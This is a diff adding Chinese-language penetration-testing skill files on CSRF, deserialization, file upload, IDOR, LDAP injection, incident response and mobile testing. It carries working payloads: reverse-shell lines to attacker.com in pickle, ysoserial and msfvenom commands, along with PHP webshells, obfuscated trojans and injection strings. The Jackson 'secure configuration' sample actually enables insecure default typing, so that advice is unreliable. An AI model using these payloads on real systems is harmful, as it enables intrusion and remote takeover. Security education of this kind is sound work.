<input type="hidden" name="csrf_token" value="">
<script>
// 从Cookie中读取Token
document.cookie.split(';').forEach(c => {
if(c.trim().startsWith('csrf_token=')) {
document.querySelector('input[name="csrf_token"]').value =
c.split('=')[1];
}
});
</script>
</form>
```
## 工具使用
### Burp Suite
**使用CSRF PoC生成器:**
1. 拦截目标请求
2. 右键 → Engagement tools → Generate CSRF PoC
3. 测试生成的PoC
### OWASP ZAP
```bash
# 使用ZAP进行CSRF扫描
zap-cli quick-scan --self-contained --start-options '-config api.disablekey=true' http://target.com
```
## 验证和报告
### 验证步骤
1. 确认目标操作没有CSRF Token保护
2. 构造恶意请求并验证可执行
3. 评估影响(数据泄露、权限提升、资金损失等)
4. 记录完整的POC
### 报告要点
- 漏洞位置和受影响的操作
- 攻击场景和影响范围
- 完整的利用步骤和PoC
- 修复建议(CSRF Token、SameSite Cookie、Referer验证等)
## 防护措施
### 推荐方案
1. **CSRF Token**
- 每个表单包含唯一Token
- Token存储在Session中
- 验证Token有效性
2. **SameSite Cookie**
```javascript
Set-Cookie: session=abc123; SameSite=Strict; Secure
```
3. **双重提交Cookie**
- Token同时存在于Cookie和表单
- 验证两者是否匹配
4. **Referer验证**
- 验证Referer是否为同源
- 注意空Referer的处理
## 注意事项
- 仅在授权测试环境中进行
- 避免对用户账户造成实际影响
- 记录所有测试步骤
- 考虑不同浏览器的行为差异
+310
View File
@@ -0,0 +1,310 @@
---
name: deserialization-testing
description: 反序列化漏洞测试的专业技能和方法论
version: 1.0.0
---
# 反序列化漏洞测试
## 概述
反序列化漏洞是一种利用应用程序反序列化不可信数据导致的漏洞,可能导致远程代码执行、拒绝服务等。本技能提供反序列化漏洞的检测、利用和防护方法。
## 漏洞原理
应用程序将序列化的数据反序列化为对象时,如果数据来源不可信,攻击者可以构造恶意序列化数据,在反序列化过程中执行任意代码。
## 常见格式
### Java
**常见库:**
- Java原生序列化
- Jackson
- Fastjson
- XStream
- Apache Commons Collections
### PHP
**常见函数:**
- unserialize()
- json_decode()
### Python
**常见模块:**
- pickle
- yaml
- json
### .NET
**常见类:**
- BinaryFormatter
- SoapFormatter
- DataContractSerializer
## 测试方法
### 1. 识别序列化数据
**Java序列化特征:**
```
AC ED 00 05 (十六进制)
rO0 (Base64)
```
**PHP序列化特征:**
```
O:8:"stdClass"
a:2:{s:4:"test";s:4:"data";}
```
**Python pickle特征:**
```
\x80\x03
```
### 2. 检测反序列化点
**常见位置:**
- Cookie值
- Session数据
- API参数
- 文件上传
- 缓存数据
- 消息队列
### 3. Java反序列化
**Apache Commons Collections利用:**
```java
// 使用ysoserial生成Payload
java -jar ysoserial.jar CommonsCollections1 "command" > payload.bin
```
**常见Gadget链:**
- CommonsCollections1-7
- Spring1-2
- ROME
- Jdk7u21
### 4. PHP反序列化
**基础测试:**
```php
<?php
class Test {
public $cmd = "id";
function __destruct() {
system($this->cmd);
}
}
echo serialize(new Test());
// O:4:"Test":1:{s:3:"cmd";s:2:"id";}
?>
```
**魔术方法利用:**
- __destruct()
- __wakeup()
- __toString()
- __call()
### 5. Python pickle
**基础测试:**
```python
import pickle
import os
class RCE:
def __reduce__(self):
return (os.system, ('id',))
pickle.dumps(RCE())
```
## 利用技术
### Java RCE
**使用ysoserial**
```bash
# 生成Payload
java -jar ysoserial.jar CommonsCollections1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTAwLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}" > payload.bin
# Base64编码
base64 -w 0 payload.bin
```
**手动构造:**
```java
// 使用Gadget链构造恶意对象
// 参考ysoserial源码
```
### PHP RCE
**利用POP链:**
```php
<?php
class A {
public $b;
function __destruct() {
$this->b->test();
}
}
class B {
public $c;
function test() {
call_user_func($this->c, "id");
}
}
$a = new A();
$a->b = new B();
$a->b->c = "system";
echo serialize($a);
?>
```
### Python RCE
**Pickle RCE**
```python
import pickle
import base64
import os
class RCE:
def __reduce__(self):
return (os.system, ('bash -i >& /dev/tcp/attacker.com/4444 0>&1',))
payload = pickle.dumps(RCE())
print(base64.b64encode(payload))
```
## 绕过技术
### 编码绕过
**Base64编码:**
```
原始: rO0ABXNy...
编码: ck8wQUJYTnk...
```
**URL编码:**
```
%72%4F%00%AB...
```
### 过滤器绕过
**使用不同Gadget链:**
- 如果CommonsCollections被过滤,尝试Spring
- 如果某个版本被过滤,尝试其他版本
### 类名混淆
**使用反射:**
```java
Class.forName("java.lang.Runtime").getMethod("exec", String.class)
```
## 工具使用
### ysoserial
```bash
# 列出可用Gadget
java -jar ysoserial.jar
# 生成Payload
java -jar ysoserial.jar CommonsCollections1 "command" > payload.bin
# 生成Base64
java -jar ysoserial.jar CommonsCollections1 "command" | base64
```
### PHPGGC
```bash
# 列出可用Gadget
./phpggc -l
# 生成Payload
./phpggc Monolog/RCE1 system id
# 生成编码Payload
./phpggc -b Monolog/RCE1 system id
```
### Burp Suite
1. 拦截包含序列化数据的请求
2. 使用插件生成Payload
3. 替换原始数据
4. 观察响应
## 验证和报告
### 验证步骤
1. 确认可以控制序列化数据
2. 验证反序列化触发代码执行
3. 评估影响(RCE、数据泄露等)
4. 记录完整的POC
### 报告要点
- 漏洞位置和序列化数据格式
- 使用的Gadget链或利用方式
- 完整的利用步骤和PoC
- 修复建议(输入验证、使用安全序列化等)
## 防护措施
### 推荐方案
1. **避免反序列化不可信数据**
- 使用JSON替代
- 使用安全的序列化格式
2. **输入验证**
```java
// 白名单验证类名
private static final Set<String> ALLOWED_CLASSES =
Set.of("com.example.SafeClass");
private Object readObject(ObjectInputStream ois) {
// 验证类名
// ...
}
```
3. **使用安全配置**
```java
// Jackson配置
objectMapper.enableDefaultTyping();
objectMapper.setVisibility(PropertyAccessor.FIELD,
JsonAutoDetect.Visibility.ANY);
```
4. **类加载器隔离**
- 使用自定义ClassLoader
- 限制可加载的类
5. **监控和日志**
- 记录反序列化操作
- 监控异常行为
## 注意事项
- 仅在授权测试环境中进行
- 注意不同版本库的Gadget链差异
- 测试时注意Payload大小限制
- 了解目标应用的依赖库版本
+328
View File
@@ -0,0 +1,328 @@
---
name: file-upload-testing
description: 文件上传漏洞测试的专业技能和方法论
version: 1.0.0
---
# 文件上传漏洞测试
## 概述
文件上传功能是Web应用常见功能,但存在多种安全风险。本技能提供文件上传漏洞的检测、利用和防护方法。
## 漏洞类型
### 1. 未验证文件类型
**仅前端验证:**
```javascript
// 可被绕过
if (!file.name.endsWith('.jpg')) {
alert('只允许上传图片');
}
```
### 2. 文件内容未验证
**仅检查扩展名:**
```php
// 危险代码
if (pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION) == 'jpg') {
move_uploaded_file($_FILES['file']['tmp_name'], 'uploads/' . $filename);
}
```
### 3. 路径遍历
**未过滤文件名:**
```
filename: ../../../etc/passwd
filename: ..\..\..\windows\system32\config\sam
```
### 4. 文件名覆盖
**可预测的文件名:**
```
uploads/1.jpg
uploads/2.jpg
```
## 测试方法
### 1. 基础检测
**测试各种文件类型:**
- .php, .jsp, .asp, .aspx
- .php3, .php4, .php5, .phtml
- .jspx, .jspf
- .htaccess, .htpasswd
**测试双扩展名:**
```
shell.php.jpg
shell.jpg.php
```
**测试大小写:**
```
shell.PHP
shell.PhP
```
### 2. 内容类型绕过
**修改Content-Type**
```
Content-Type: image/jpeg
# 但文件内容是PHP代码
```
**Magic Bytes**
```php
// 在PHP代码前添加图片头
GIF89a<?php phpinfo(); ?>
```
### 3. 解析漏洞
**Apache解析漏洞:**
```
shell.php.xxx # Apache可能解析为PHP
```
**IIS解析漏洞:**
```
shell.asp;.jpg
shell.asp:.jpg
```
**Nginx解析漏洞:**
```
shell.jpg%00.php
```
### 4. 竞争条件
**文件上传后立即访问:**
```python
# 上传.php文件,在上传完成但删除前访问
import requests
import threading
def upload():
files = {'file': ('shell.php', '<?php system($_GET["cmd"]); ?>')}
requests.post('http://target.com/upload', files=files)
def access():
time.sleep(0.1)
requests.get('http://target.com/uploads/shell.php?cmd=id')
threading.Thread(target=upload).start()
threading.Thread(target=access).start()
```
## 利用技术
### PHP WebShell
**基础WebShell**
```php
<?php system($_GET['cmd']); ?>
```
**一句话木马:**
```php
<?php eval($_POST['a']); ?>
```
**绕过过滤:**
```php
<?php
$_GET['cmd']($_POST['a']);
// 使用: ?cmd=system
```
### .htaccess利用
**上传.htaccess**
```
AddType application/x-httpd-php .jpg
```
**然后上传shell.jpg(实际是PHP代码)**
### 图片马
**GIF图片马:**
```php
GIF89a
<?php
phpinfo();
?>
```
**PNG图片马:**
```bash
# 使用工具将PHP代码嵌入PNG
python3 png2php.py shell.php shell.png
```
### 文件包含配合
**如果存在文件包含漏洞:**
```
# 上传包含PHP代码的图片
# 然后通过文件包含执行
?file=uploads/shell.jpg
```
## 绕过技术
### 扩展名绕过
**双扩展名:**
```
shell.php.jpg
shell.php;.jpg
shell.php%00.jpg
```
**大小写:**
```
shell.PHP
shell.PhP
```
**特殊字符:**
```
shell.php.
shell.php
shell.php%20
```
### Content-Type绕过
**修改请求头:**
```
Content-Type: image/jpeg
Content-Type: image/png
Content-Type: image/gif
```
### Magic Bytes绕过
**添加文件头:**
```php
// JPEG
\xFF\xD8\xFF\xE0<?php phpinfo(); ?>
// GIF
GIF89a<?php phpinfo(); ?>
// PNG
\x89\x50\x4E\x47<?php phpinfo(); ?>
```
### 代码混淆
**使用短标签:**
```php
<?= system($_GET['cmd']); ?>
```
**使用变量:**
```php
<?php
$a='sys';
$b='tem';
$a.$b($_GET['cmd']);
```
## 工具使用
### Burp Suite
1. 拦截文件上传请求
2. 修改文件名和内容
3. 测试各种绕过技术
### Upload Bypass
```bash
# 使用各种技术测试文件上传
python upload_bypass.py -u http://target.com/upload -f shell.php
```
### WebShell生成
```bash
# 生成各种WebShell
msfvenom -p php/meterpreter/reverse_tcp LHOST=attacker.com LPORT=4444 -f raw > shell.php
```
## 验证和报告
### 验证步骤
1. 确认可以上传恶意文件
2. 验证文件可以执行
3. 评估影响(命令执行、数据泄露等)
4. 记录完整的POC
### 报告要点
- 漏洞位置和上传功能
- 可上传的文件类型和执行方式
- 完整的利用步骤和PoC
- 修复建议(文件类型验证、内容检查、安全存储等)
## 防护措施
### 推荐方案
1. **文件类型白名单**
```python
ALLOWED_EXTENSIONS = {'jpg', 'png', 'gif'}
ext = filename.rsplit('.', 1)[1].lower()
if ext not in ALLOWED_EXTENSIONS:
raise ValueError("File type not allowed")
```
2. **文件内容验证**
```python
import magic
file_type = magic.from_buffer(file_content, mime=True)
if not file_type.startswith('image/'):
raise ValueError("Invalid file content")
```
3. **重命名文件**
```python
import uuid
filename = str(uuid.uuid4()) + '.' + ext
```
4. **隔离存储**
- 文件存储在Web根目录外
- 通过脚本代理访问
- 禁用执行权限
5. **文件扫描**
- 使用杀毒软件扫描
- 检查文件内容
- 移除可执行权限
6. **大小限制**
```python
MAX_SIZE = 5 * 1024 * 1024 # 5MB
if file.size > MAX_SIZE:
raise ValueError("File too large")
```
## 注意事项
- 仅在授权测试环境中进行
- 避免上传恶意文件到生产环境
- 测试后及时清理
- 注意不同服务器的解析差异
+319
View File
@@ -0,0 +1,319 @@
---
name: idor-testing
description: IDOR不安全的直接对象引用测试的专业技能和方法论
version: 1.0.0
---
# IDOR不安全的直接对象引用测试
## 概述
IDORInsecure Direct Object Reference)是一种访问控制漏洞,当应用程序直接使用用户提供的输入来访问资源,而未验证用户是否有权限访问该资源时发生。本技能提供IDOR漏洞的检测、利用和防护方法。
## 漏洞原理
应用程序使用可预测的标识符(如ID、文件名)直接引用资源,未验证当前用户是否有权限访问该资源。
**危险代码示例:**
```php
// 直接使用用户输入的ID
$file = file_get_contents('/files/' . $_GET['id'] . '.pdf');
```
## 测试方法
### 1. 识别直接对象引用
**常见资源类型:**
- 用户ID
- 文件ID/文件名
- 订单ID
- 文档ID
- 账户ID
- 记录ID
**常见位置:**
- URL参数
- POST数据
- Cookie值
- HTTP头
- 文件路径
### 2. 枚举测试
**顺序ID测试:**
```
/user?id=1
/user?id=2
/user?id=3
```
**UUID测试:**
```
/user?id=550e8400-e29b-41d4-a716-446655440000
/user?id=550e8400-e29b-41d4-a716-446655440001
```
**文件名测试:**
```
/files/document1.pdf
/files/document2.pdf
/files/invoice_2024_001.pdf
```
### 3. 水平权限测试
**访问其他用户资源:**
```
当前用户ID: 100
测试: /user?id=101
测试: /user?id=102
```
**访问其他用户文件:**
```
/files/user100_document.pdf
测试: /files/user101_document.pdf
```
### 4. 垂直权限测试
**普通用户访问管理员资源:**
```
/admin/users?id=1
/admin/settings
/admin/logs
```
## 利用技术
### 用户信息泄露
**枚举用户资料:**
```bash
# 顺序枚举
for i in {1..1000}; do
curl "https://target.com/user?id=$i"
done
# 观察响应差异
```
### 文件访问
**访问其他用户文件:**
```
/files/invoice_12345.pdf
/files/report_67890.pdf
/files/contract_11111.pdf
```
**目录遍历结合:**
```
/files/../admin/config.php
/files/../../etc/passwd
```
### 数据修改
**修改其他用户数据:**
```http
POST /api/user/update
Content-Type: application/json
{
"id": 101,
"email": "attacker@evil.com"
}
```
### 批量操作
**批量获取数据:**
```python
import requests
for user_id in range(1, 1000):
response = requests.get(f'https://target.com/api/user/{user_id}')
if response.status_code == 200:
print(f"User {user_id}: {response.json()}")
```
## 绕过技术
### ID混淆
**Base64编码:**
```
原始ID: 123
编码: MTIz
URL: /user?id=MTIz
```
**哈希值:**
```
原始ID: 123
哈希: 202cb962ac59075b964b07152d234b70
URL: /user?id=202cb962ac59075b964b07152d234b70
```
### 参数名混淆
**使用不同参数名:**
```
/user?id=123
/user?uid=123
/user?user_id=123
/user?account=123
```
### HTTP方法绕过
**尝试不同HTTP方法:**
```
GET /user/123
POST /user/123
PUT /user/123
PATCH /user/123
```
### 路径混淆
**尝试不同路径:**
```
/api/v1/user/123
/api/user/123
/user/123
/users/123
```
## 工具使用
### Burp Suite
**使用Intruder**
1. 拦截请求
2. 发送到Intruder
3. 标记ID参数
4. 使用数字序列或自定义列表
5. 观察响应差异
**使用Repeater**
1. 手动修改ID
2. 测试不同值
3. 观察响应
### OWASP ZAP
```bash
# 使用ZAP进行IDOR扫描
zap-cli active-scan --scanners all http://target.com
```
### Python脚本
```python
import requests
import json
def test_idor(base_url, user_id_range):
for user_id in user_id_range:
url = f"{base_url}/user?id={user_id}"
response = requests.get(url)
if response.status_code == 200:
data = response.json()
print(f"User {user_id}: {data.get('email', 'N/A')}")
test_idor("https://target.com", range(1, 100))
```
## 验证和报告
### 验证步骤
1. 确认可以访问未授权的资源
2. 验证可以读取、修改或删除其他用户数据
3. 评估影响(数据泄露、隐私侵犯等)
4. 记录完整的POC
### 报告要点
- 漏洞位置和资源标识符
- 可访问的未授权资源
- 完整的利用步骤和PoC
- 修复建议(访问控制、资源映射等)
## 防护措施
### 推荐方案
1. **访问控制验证**
```python
def get_user_data(user_id, current_user_id):
# 验证权限
if user_id != current_user_id:
raise PermissionDenied("Cannot access other user's data")
# 返回数据
return db.get_user(user_id)
```
2. **间接对象引用**
```python
# 使用映射表
user_mapping = {
'abc123': 100,
'def456': 101,
'ghi789': 102
}
def get_user(mapped_id):
real_id = user_mapping.get(mapped_id)
if not real_id:
raise NotFound()
return db.get_user(real_id)
```
3. **基于角色的访问控制**
```python
def check_permission(user, resource):
if user.role == 'admin':
return True
if resource.owner_id == user.id:
return True
return False
```
4. **资源所有权验证**
```python
def update_user_data(user_id, data, current_user):
user = db.get_user(user_id)
# 验证所有权
if user.id != current_user.id and current_user.role != 'admin':
raise PermissionDenied()
# 更新数据
db.update_user(user_id, data)
```
5. **使用不可预测的标识符**
```python
import uuid
# 使用UUID替代顺序ID
resource_id = str(uuid.uuid4())
```
6. **最小权限原则**
- 只返回用户有权限访问的数据
- 使用数据过滤
- 限制可访问的资源范围
## 注意事项
- 仅在授权测试环境中进行
- 避免访问或修改真实用户数据
- 注意不同资源的访问控制差异
- 测试时注意请求频率,避免触发防护
+272
View File
@@ -0,0 +1,272 @@
---
name: incident-response
description: 安全事件响应的专业技能和方法论
version: 1.0.0
---
# 安全事件响应
## 概述
安全事件响应是处理安全事件的关键流程。本技能提供安全事件响应的方法、工具和最佳实践。
## 响应流程
### 1. 准备阶段
**准备工作:**
- 建立响应团队
- 制定响应计划
- 准备工具和资源
- 建立通信渠道
### 2. 识别阶段
**识别事件:**
- 监控告警
- 异常检测
- 日志分析
- 用户报告
### 3. 遏制阶段
**遏制措施:**
- 隔离受影响系统
- 禁用账户
- 阻断网络连接
- 备份证据
### 4. 清除阶段
**清除威胁:**
- 移除恶意软件
- 修复漏洞
- 重置凭证
- 清理后门
### 5. 恢复阶段
**恢复系统:**
- 恢复备份
- 验证系统完整性
- 监控系统
- 逐步恢复服务
### 6. 总结阶段
**总结经验:**
- 事件报告
- 经验教训
- 改进措施
- 更新流程
## 工具使用
### 日志分析
**使用Splunk**
```bash
# 搜索日志
index=security event_type="failed_login"
# 统计分析
index=security | stats count by src_ip
# 时间序列分析
index=security | timechart count by event_type
```
**使用ELK**
```bash
# Elasticsearch查询
GET /logs/_search
{
"query": {
"match": {
"event_type": "malware"
}
}
}
```
### 取证工具
**使用Volatility**
```bash
# 分析内存镜像
volatility -f memory.dump imageinfo
# 列出进程
volatility -f memory.dump --profile=Win7SP1x64 pslist
# 提取进程内存
volatility -f memory.dump --profile=Win7SP1x64 memdump -p 1234 -D output/
```
**使用Autopsy**
```bash
# 启动Autopsy
# 创建案例
# 添加证据
# 分析数据
```
### 网络分析
**使用Wireshark**
```bash
# 捕获流量
wireshark -i eth0
# 分析PCAP文件
wireshark -r capture.pcap
# 过滤流量
# 显示过滤器: ip.addr == 192.168.1.100
# 捕获过滤器: host 192.168.1.100
```
**使用tcpdump**
```bash
# 捕获流量
tcpdump -i eth0 -w capture.pcap
# 分析流量
tcpdump -r capture.pcap -A
```
## 事件类型
### 恶意软件
**响应步骤:**
1. 隔离受影响系统
2. 收集样本
3. 分析恶意软件
4. 清除威胁
5. 修复漏洞
**工具:**
- VirusTotal
- Cuckoo Sandbox
- YARA规则
### 数据泄露
**响应步骤:**
1. 确认泄露范围
2. 遏制泄露
3. 评估影响
4. 通知相关方
5. 修复漏洞
**检查项目:**
- 泄露数据量
- 受影响用户
- 泄露渠道
- 数据敏感性
### 拒绝服务
**响应步骤:**
1. 确认攻击类型
2. 启用防护措施
3. 过滤恶意流量
4. 监控系统状态
5. 恢复正常服务
**防护措施:**
- DDoS防护服务
- 流量清洗
- 限流措施
- CDN防护
### 未授权访问
**响应步骤:**
1. 禁用受影响账户
2. 重置凭证
3. 检查访问日志
4. 评估数据访问
5. 修复漏洞
**检查项目:**
- 访问时间
- 访问内容
- 访问来源
- 数据修改
## 响应清单
### 准备阶段
- [ ] 建立响应团队
- [ ] 制定响应计划
- [ ] 准备工具
- [ ] 建立通信渠道
### 识别阶段
- [ ] 确认事件
- [ ] 收集信息
- [ ] 评估影响
- [ ] 记录时间线
### 遏制阶段
- [ ] 隔离系统
- [ ] 禁用账户
- [ ] 阻断连接
- [ ] 备份证据
### 清除阶段
- [ ] 移除威胁
- [ ] 修复漏洞
- [ ] 重置凭证
- [ ] 验证清除
### 恢复阶段
- [ ] 恢复系统
- [ ] 验证完整性
- [ ] 监控系统
- [ ] 恢复服务
### 总结阶段
- [ ] 编写报告
- [ ] 总结经验
- [ ] 改进措施
- [ ] 更新流程
## 最佳实践
### 1. 准备
- 建立响应团队
- 制定响应计划
- 定期演练
- 准备工具
### 2. 响应
- 快速响应
- 系统化处理
- 记录所有操作
- 保护证据
### 3. 沟通
- 内部沟通
- 外部通知
- 状态更新
- 事后报告
### 4. 改进
- 事件分析
- 流程改进
- 工具更新
- 培训提升
## 注意事项
- 快速响应
- 保护证据
- 记录操作
- 遵守法律法规
+300
View File
@@ -0,0 +1,300 @@
---
name: ldap-injection-testing
description: LDAP注入漏洞测试的专业技能和方法论
version: 1.0.0
---
# LDAP注入漏洞测试
## 概述
LDAP注入是一种类似于SQL注入的漏洞,利用LDAP查询语句的构造缺陷,可能导致信息泄露、权限绕过等。本技能提供LDAP注入的检测、利用和防护方法。
## 漏洞原理
应用程序将用户输入直接拼接到LDAP查询语句中,未进行充分验证和过滤,导致攻击者可以修改查询逻辑。
**危险代码示例:**
```java
String filter = "(&(cn=" + userInput + ")(userPassword=" + password + "))";
ldapContext.search(baseDN, filter, ...);
```
## LDAP基础
### 查询语法
**基础查询:**
```
(cn=John)
(objectClass=person)
(&(cn=John)(mail=john@example.com))
(|(cn=John)(cn=Jane))
(!(cn=John))
```
### 特殊字符
**需要转义的字符:**
- `(` `)` - 括号
- `*` - 通配符
- `\` - 转义符
- `/` - 路径分隔符
- `NUL` - 空字符
## 测试方法
### 1. 识别LDAP输入点
**常见功能:**
- 用户登录
- 用户搜索
- 目录浏览
- 权限验证
### 2. 基础检测
**测试特殊字符:**
```
*)(&
*)(|
*))(
*))%00
```
**测试逻辑操作符:**
```
*)(&(cn=*
*)(|(cn=*
*))(!(cn=*
```
### 3. 认证绕过
**基础绕过:**
```
用户名: *)(&
密码: *
查询: (&(cn=*)(&)(userPassword=*))
```
**更精确的绕过:**
```
用户名: admin)(&(cn=admin
密码: *))
查询: (&(cn=admin)(&(cn=admin)(userPassword=*)))
```
### 4. 信息泄露
**枚举用户:**
```
*)(cn=*
*)(uid=*
*)(mail=*
```
**获取属性:**
```
*)(|(cn=*)(userPassword=*
*)(|(objectClass=*)(cn=*
```
## 利用技术
### 认证绕过
**方法1:逻辑绕过**
```
输入: *)(&
查询: (&(cn=*)(&)(userPassword=*))
结果: 匹配所有用户
```
**方法2:注释绕过**
```
输入: admin)(&(cn=admin
查询: (&(cn=admin)(&(cn=admin)(userPassword=*)))
```
**方法3:通配符**
```
输入: *)(|(cn=*)(userPassword=*
查询: (&(cn=*)(|(cn=*)(userPassword=*)(userPassword=*))
```
### 信息泄露
**枚举所有用户:**
```
搜索: *)(cn=*
结果: 返回所有cn属性
```
**获取密码哈希:**
```
搜索: *)(|(cn=*)(userPassword=*
结果: 返回用户和密码哈希
```
**获取敏感属性:**
```
搜索: *)(|(cn=*)(mail=*)(telephoneNumber=*
结果: 返回多个敏感属性
```
### 权限提升
**修改查询逻辑:**
```
原始: (&(cn=user)(memberOf=CN=Users,DC=example,DC=com))
注入: user)(memberOf=CN=Admins,DC=example,DC=com))(|(cn=user
结果: 可能绕过权限检查
```
## 绕过技术
### 编码绕过
**URL编码:**
```
*)(& → %2A%29%28%26
*)(| → %2A%29%28%7C
```
**Unicode编码:**
```
* → \u002A
( → \u0028
) → \u0029
```
### 注释绕过
**使用注释:**
```
*)(&(cn=*
*)(|(cn=*
```
### 空字符注入
**使用NULL字节:**
```
*))%00
```
## 工具使用
### JXplorer
**图形化LDAP客户端:**
- 连接LDAP服务器
- 浏览目录结构
- 执行查询测试
### ldapsearch
```bash
# 基础查询
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(cn=*)"
# 测试注入
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(cn=*)(&"
```
### Burp Suite
1. 拦截LDAP查询请求
2. 修改查询参数
3. 观察响应结果
### Python脚本
```python
import ldap3
server = ldap3.Server('ldap://target.com')
conn = ldap3.Connection(server, authentication=ldap3.SIMPLE,
user='cn=admin,dc=example,dc=com',
password='password')
# 测试注入
filter_str = '*)(&'
conn.search('dc=example,dc=com', filter_str)
print(conn.entries)
```
## 验证和报告
### 验证步骤
1. 确认可以控制LDAP查询
2. 验证认证绕过或信息泄露
3. 评估影响(未授权访问、数据泄露等)
4. 记录完整的POC
### 报告要点
- 漏洞位置和输入参数
- LDAP查询构造方式
- 完整的利用步骤和PoC
- 修复建议(输入验证、参数化查询等)
## 防护措施
### 推荐方案
1. **输入验证**
```java
private static final String[] LDAP_ESCAPE_CHARS =
{"\\", "*", "(", ")", "\0", "/"};
public static String escapeLDAP(String input) {
if (input == null) {
return null;
}
StringBuilder sb = new StringBuilder();
for (int i = 0; i < input.length(); i++) {
char c = input.charAt(i);
if (Arrays.asList(LDAP_ESCAPE_CHARS).contains(String.valueOf(c))) {
sb.append("\\");
}
sb.append(c);
}
return sb.toString();
}
```
2. **参数化查询**
```java
// 使用LDAP API的参数化功能
String filter = "(&(cn={0})(userPassword={1}))";
Object[] args = {escapedCN, escapedPassword};
// 使用API构建查询
```
3. **白名单验证**
```java
// 只允许特定字符
if (!input.matches("^[a-zA-Z0-9@._-]+$")) {
throw new IllegalArgumentException("Invalid input");
}
```
4. **最小权限**
- LDAP连接使用最小权限账户
- 限制可查询的属性
- 使用访问控制列表
5. **错误处理**
- 不返回详细错误信息
- 统一错误响应
- 记录错误日志
## 注意事项
- 仅在授权测试环境中进行
- 注意不同LDAP服务器的语法差异
- 测试时避免对目录造成影响
- 了解目标LDAP服务器的配置
+370
View File
@@ -0,0 +1,370 @@
---
name: mobile-app-security-testing
description: 移动应用安全测试的专业技能和方法论
version: 1.0.0
---
# 移动应用安全测试
## 概述
移动应用安全测试是确保移动应用安全性的重要环节。本技能提供移动应用安全测试的方法、工具和最佳实践,涵盖Android和iOS平台。
## 测试范围
### 1. 应用安全
**检查项目:**
- 代码混淆
- 反编译防护
- 调试防护
- 证书绑定
### 2. 数据安全
**检查项目:**
- 数据加密
- 密钥管理
- 敏感数据存储
- 数据传输
### 3. 认证授权
**检查项目:**
- 认证机制
- Token管理
- 生物识别
- 会话管理
### 4. 通信安全
**检查项目:**
- TLS/SSL配置
- 证书验证
- API安全
- 中间人攻击防护
## Android安全测试
### 静态分析
**使用APKTool**
```bash
# 反编译APK
apktool d app.apk
# 查看AndroidManifest.xml
cat app/AndroidManifest.xml
# 查看Smali代码
find app/smali -name "*.smali"
```
**使用Jadx**
```bash
# 反编译APK
jadx -d output app.apk
# 查看Java源码
find output -name "*.java"
```
**使用MobSF**
```bash
# 启动MobSF
docker run -it -p 8000:8000 opensecurity/mobsf
# 上传APK进行分析
# 访问 http://localhost:8000
```
### 动态分析
**使用Frida**
```javascript
// Hook函数
Java.perform(function() {
var MainActivity = Java.use("com.example.MainActivity");
MainActivity.onCreate.implementation = function(savedInstanceState) {
console.log("[*] onCreate called");
this.onCreate(savedInstanceState);
};
});
```
**使用Objection**
```bash
# 启动Objection
objection -g com.example.app explore
# Hook函数
android hooking watch class_method com.example.MainActivity.onCreate
```
**使用Burp Suite**
```bash
# 配置代理
# Android设置代理指向Burp Suite
# 安装Burp证书
```
### 常见漏洞
**硬编码密钥:**
```java
// 不安全的代码
String apiKey = "1234567890abcdef";
String password = "admin123";
```
**不安全的存储:**
```java
// SharedPreferences存储敏感数据
SharedPreferences prefs = getSharedPreferences("data", MODE_WORLD_READABLE);
prefs.edit().putString("password", password).apply();
```
**证书验证绕过:**
```java
// 不验证证书
TrustManager[] trustAllCerts = new TrustManager[] {
new X509TrustManager() {
public X509Certificate[] getAcceptedIssuers() { return null; }
public void checkClientTrusted(X509Certificate[] certs, String authType) { }
public void checkServerTrusted(X509Certificate[] certs, String authType) { }
}
};
```
## iOS安全测试
### 静态分析
**使用class-dump**
```bash
# 导出头文件
class-dump app.ipa
# 查看头文件
find app -name "*.h"
```
**使用Hopper**
```bash
# 使用Hopper反汇编
# 打开app二进制文件
# 分析汇编代码
```
**使用otool**
```bash
# 查看Mach-O信息
otool -L app
# 查看字符串
strings app | grep -i "password\|key\|secret"
```
### 动态分析
**使用Frida**
```javascript
// Hook Objective-C方法
var className = ObjC.classes.ViewController;
var method = className['- login:password:'];
Interceptor.attach(method.implementation, {
onEnter: function(args) {
console.log("[*] Login called");
console.log("Username: " + ObjC.Object(args[2]).toString());
console.log("Password: " + ObjC.Object(args[3]).toString());
}
});
```
**使用Cycript**
```bash
# 附加到进程
cycript -p app
# 执行命令
[UIApplication sharedApplication]
```
### 常见漏洞
**硬编码密钥:**
```objective-c
// 不安全的代码
NSString *apiKey = @"1234567890abcdef";
NSString *password = @"admin123";
```
**不安全的存储:**
```objective-c
// Keychain存储不当
NSUserDefaults *defaults = [NSUserDefaults standardUserDefaults];
[defaults setObject:password forKey:@"password"];
```
**证书验证绕过:**
```objective-c
// 不验证证书
- (void)connection:(NSURLConnection *)connection
didReceiveAuthenticationChallenge:(NSURLAuthenticationChallenge *)challenge {
[challenge.sender useCredential:[NSURLCredential credentialForTrust:challenge.protectionSpace.serverTrust]
forAuthenticationChallenge:challenge];
}
```
## 工具使用
### MobSF
```bash
# 启动MobSF
docker run -it -p 8000:8000 opensecurity/mobsf
# 上传应用进行分析
# 支持Android和iOS
```
### Frida
```bash
# 安装Frida
pip install frida-tools
# 运行脚本
frida -U -f com.example.app -l script.js
```
### Objection
```bash
# 安装Objection
pip install objection
# 启动Objection
objection -g com.example.app explore
```
### Burp Suite
**配置代理:**
1. 配置Burp Suite监听器
2. 移动设备设置代理
3. 安装Burp证书
4. 拦截和分析流量
## 测试清单
### 应用安全
- [ ] 代码混淆检查
- [ ] 反编译防护
- [ ] 调试防护
- [ ] 证书绑定
### 数据安全
- [ ] 数据加密检查
- [ ] 密钥管理
- [ ] 敏感数据存储
- [ ] 数据传输安全
### 认证授权
- [ ] 认证机制测试
- [ ] Token管理
- [ ] 会话管理
- [ ] 生物识别
### 通信安全
- [ ] TLS/SSL配置
- [ ] 证书验证
- [ ] API安全测试
- [ ] 中间人攻击防护
## 常见安全问题
### 1. 硬编码密钥
**问题:**
- API密钥硬编码
- 密码硬编码
- 加密密钥硬编码
**修复:**
- 使用密钥管理服务
- 使用环境变量
- 使用安全存储
### 2. 不安全的存储
**问题:**
- 明文存储敏感数据
- 使用不安全的存储方式
- 数据未加密
**修复:**
- 使用加密存储
- 使用Keychain/Keystore
- 实施数据加密
### 3. 证书验证绕过
**问题:**
- 不验证SSL证书
- 接受自签名证书
